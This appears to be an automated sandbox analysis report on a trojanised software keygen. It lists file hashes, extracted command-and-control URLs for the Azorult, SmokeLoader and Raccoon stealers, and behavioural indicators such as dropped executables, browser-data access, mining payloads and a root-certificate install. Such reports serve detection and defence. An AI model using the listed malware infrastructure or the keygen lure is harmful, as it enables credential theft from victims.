Analysis
-
max time kernel
34s -
max time network
601s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
03-04-2021 06:46
Static task
static1
Behavioral task
behavioral1
Sample
Embarcadero.RAD.Studio.XE2.Arc.keygen.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Embarcadero.RAD.Studio.XE2.Arc.keygen.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Embarcadero.RAD.Studio.XE2.Arc.keygen.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Embarcadero.RAD.Studio.XE2.Arc.keygen.exe
Resource
win10v20201028
General
-
Target
Embarcadero.RAD.Studio.XE2.Arc.keygen.exe
-
Size
5.4MB
-
MD5
71e1b5c96e0b450768b799f4f2ba8c6a
-
SHA1
d974040a5020d4132094f04d42edfb24c28b3c1a
-
SHA256
16bd29c401eabb1c1d158f615fab03d81d6db786d936c4f3d3f929a16162d1c2
-
SHA512
96009bbccfedc418a4ed8a02d19e9c42f90eb6f9827ae0da554e1d8d4a8eb89255e0434eaec0ebf2b72967b52fb604845c85819bf7ccc82ef912edb8dd8cbdfc
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
Extracted
raccoon
afefd33a49c7cbd55d417545269920f24c85aa37
-
url4cnc
https://telete.in/jagressor_kz
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral3/memory/5168-222-0x0000000002510000-0x0000000002E1A000-memory.dmp family_glupteba behavioral3/memory/5168-224-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba behavioral3/memory/5168-225-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
XMRig Miner Payload 8 IoCs
resource yara_rule behavioral3/memory/4272-153-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/4272-154-0x00000001402CA898-mapping.dmp xmrig behavioral3/memory/4272-158-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/4272-233-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/4692-943-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/4692-1015-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/6656-1087-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/6656-1156-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Executes dropped EXE 13 IoCs
pid Process 804 keygen-pr.exe 2696 keygen-step-1.exe 1168 keygen-step-3.exe 4000 keygen-step-4.exe 3992 key.exe 956 MicrosoftEdge.exe 3728 multitimer.exe 904 setups.exe 2236 askinstall20.exe 2704 setups.tmp 4496 Full Program Features.exe 4612 file.exe 4740 multitimer.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation app.exe -
Loads dropped DLL 7 IoCs
pid Process 2704 setups.tmp 2704 setups.tmp 2704 setups.tmp 2704 setups.tmp 2704 setups.tmp 2704 setups.tmp 2704 setups.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA app.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 13 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 553 ipinfo.io 564 ipinfo.io 73 api.ipify.org 136 ipinfo.io 187 ip-api.com 299 ipinfo.io 301 ipinfo.io 444 api.ipify.org 570 ipinfo.io 597 ipinfo.io 134 ipinfo.io 279 api.ipify.org 476 ip-api.com -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\unins.vbs Full Program Features.exe File created C:\Program Files\unins0000.dat Full Program Features.exe File created C:\Program Files\unins0000.dll Full Program Features.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 16 IoCs
pid pid_target Process procid_target 4804 4436 WerFault.exe 242 4336 580 WerFault.exe 240 7776 2448 WerFault.exe 163 8764 2448 WerFault.exe 163 6984 2448 WerFault.exe 163 6880 2448 WerFault.exe 163 6944 2448 WerFault.exe 163 5036 2448 WerFault.exe 163 8212 6056 WerFault.exe 144 7800 2448 WerFault.exe 163 4028 2448 WerFault.exe 163 5432 2448 WerFault.exe 163 9224 2448 WerFault.exe 163 9872 2448 WerFault.exe 163 9532 2448 WerFault.exe 163 7908 5112 WerFault.exe 424 -
Delays execution with timeout.exe 9 IoCs
pid Process 7360 timeout.exe 9772 timeout.exe 8264 timeout.exe 6724 timeout.exe 8188 timeout.exe 6976 timeout.exe 9752 timeout.exe 5352 timeout.exe 7660 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe -
Kills process with taskkill 10 IoCs
pid Process 9036 taskkill.exe 7328 taskkill.exe 8428 taskkill.exe 9800 taskkill.exe 7628 taskkill.exe 3672 taskkill.exe 4544 taskkill.exe 2192 taskkill.exe 4516 taskkill.exe 392 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main app.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "{9019A937-E073-4E19-8A54-5E7B01F14FB0}" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History app.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache app.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 app.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 010000008d32be751d7b00bceb9c2c5e7642bf97652ff2cda2d40879e2a0666b540858e30e6ea3d052671103a4f82450bbd0f4fefaa317222c176418bcf8aa0f0fa1c16c6ac34adbca0895cbfe346099c0bc33201c012e1a019ffd200281940968a7119107d1bc52b17eec6ba6f161970e25c4c099e7d1cef88bf51bdbda5d45323ab3f32d38fa193ceaaed10fd0f84d962a601b01f71b41c0fdcde7eaa573825d7a4d4a14986324ca6aa0cf4c6f2c6d28ed33945acf3c4acd1435ea188123b50687fc3eca9041e9e11f0eb9686f7ca4c08cc03690109c1a16f04a97fe0d807b7b81c80dd4c2506c562a5e4fc5706fb36b29b409785b764618b1ee437bebbc9e5288f804cdcd66d25ca980fdaf124bcac2e2b42ad14e4d64da761e4c0cbab2a32dbcd8c89b514f89cdbd1f63b0f532455dd9cec3648b803edb614486aa19d970013d086ea2ee08fdd1868a368cb98917a72cb7c712b0658f24914b0701aae1fd192b5d64a344cae17b25166b6affea4735fdab85bc5ead4d5d26f338690c171700a662291ef3c70309b869b02c652d76ab6a230843369f900e40753bb98aaf4239e1149c23acf791f704 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" app.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000939595d40bead9fe9d88e1a3d4d8bc96436404f0ef4d9187f8ecefebdcfb33be3a0bf8871029eb6c95eb83ab7d50b1ca001e3db102bf8a6f12b825e2c1393c3797716ace1895d0307bc79d943d2ae8f4c128b557aa1e5384faa8 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" app.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = b32dddac5528d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content app.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{D002E0CF-9BAE-4679-828A-DD2ABF7A6BBA} = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache app.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies app.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompleted = "1" MicrosoftEdge.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f0603